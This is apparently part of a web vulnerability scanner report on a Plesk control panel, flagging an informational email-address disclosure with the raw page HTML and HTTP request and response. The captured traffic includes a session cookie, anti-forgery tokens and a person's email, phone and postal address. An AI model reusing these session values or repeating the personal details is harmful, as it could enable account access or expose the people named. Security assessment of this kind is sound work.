items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-vcard-contactName'>Hoyt LLC Research</span>

</div>
</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="h02332" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="h02332@gmail.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId" disabled="1">
<option value="5" label="Owner" selected="selected">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-login'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-login'>xsscx</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='general-account-language-form-row' class='form-row' >
<div class='field-name'><label for='general-account-language'>Panel language&nbsp;</label></div>
<div class='field-value'>

<select name="general[account][language]" id="general-account-language">
<option value="en-US" label="ENGLISH (United States)" selected="selected">ENGLISH (United States)</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" disabled="disabled" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="Hoyt LLC Research" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="+1 339 206 1886" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80">PO BOX 250
</textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="Accord" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="MA" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="02018" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="..land Islands">..land Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/3

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/user/edit/id/3 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:51:20 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:51:20 GMT
Connection: close
Content-Length: 45474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>format-1 - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F3' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-1</b></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
